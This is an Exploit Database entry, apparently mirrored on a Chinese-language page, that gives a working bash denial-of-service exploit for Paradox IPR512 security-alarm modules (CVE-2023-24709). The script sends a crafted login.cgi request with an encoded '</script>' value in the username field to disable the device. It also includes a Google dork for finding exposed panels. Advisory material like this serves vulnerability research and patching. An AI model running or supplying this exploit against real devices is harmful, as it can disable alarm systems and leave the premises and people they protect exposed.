Paradox Security Systems IPR512 – Denial Of Service

• Exploit Database
• 19 阅读

• 作者： Giorgi Dograshvili
  日期： 2023-04-10
• 类别：

  • dos
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/51356/

• #!/bin/bash
  
  # Exploit Title: Paradox Security Systems IPR512 - Denial Of Service
  # Google Dork: intitle:"ipr512 * - login screen"
  # Date: 09-APR-2023
  # Exploit Author: Giorgi Dograshvili
  # Vendor Homepage: Paradox - Headquarters <https://www.paradox.com/Products/default.asp?PID=423> (https://www.paradox.com/Products/default.asp?PID=423)
  # Version: IPR512
  # CVE : CVE-2023-24709
  
  # Function to display banner message
  display_banner() {
  echo "******************************************************"
  echo "**"
  echo "*PoC CVE-2023-24709*"
  echo "*BE AWARE!!! RUNNING THE SCRIPT WILL MAKE*"
  echo "*A DAMAGING IMPACT ON THE SERVICE FUNCTIONING! *"
  echo "*by SlashXzerozero *"
  echo "**"
  echo "******************************************************"
  }
  
  # Call the function to display the banner
  display_banner
  echo ""
  echo ""
  echo "Please enter a domain name or IP address with or without port"
  read -p"(e.g. example.net or 192.168.12.34, or 192.168.56.78:999): " domain
  
  # Step 2: Ask for user confirmation
  read -p "This will DAMAGE the service. Do you still want it to proceed? (Y/n): " confirm
  if [[ $confirm == "Y" || $confirm == "y" ]]; then
  # Display loading animation
  animation=("|" "/" "-" "\\")
  index=0
  while [[ $index -lt 10 ]]; do
  echo -ne "Loading ${animation[index]} \r"
  sleep 1
  index=$((index + 1))
  done
  
  # Use curl to send HTTP GET request with custom headers and timeout
  response=$(curl -i -s -k -X GET \
  -H "Host: $domain" \
  -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36" \
  -H "Accept: */" \
  -H "Referer: http://$domain/login.html" \
  -H "Accept-Encoding: gzip, deflate" \
  -H "Accept-Language: en-US,en;q=0.9" \
  -H "Connection: close" \
  --max-time 10 \
  "http://$domain/login.cgi?log_user=%3c%2f%73%63%72%69%70%74%3e&log_passmd5=&r=3982")
  
  # Check response for HTTP status code 200 and print result
  if [[ $response == *"HTTP/1.1 200 OK"* ]]; then
  echo -e "\nIt seems to be vulnerable! Please check the webpanel: http://$domain/login.html"
  else
  echo -e "\nShouldn't be vulnerable! Please check the webpanel:http://$domain/login.html"
  fi
  else
  echo "The script is stopped!."
  fi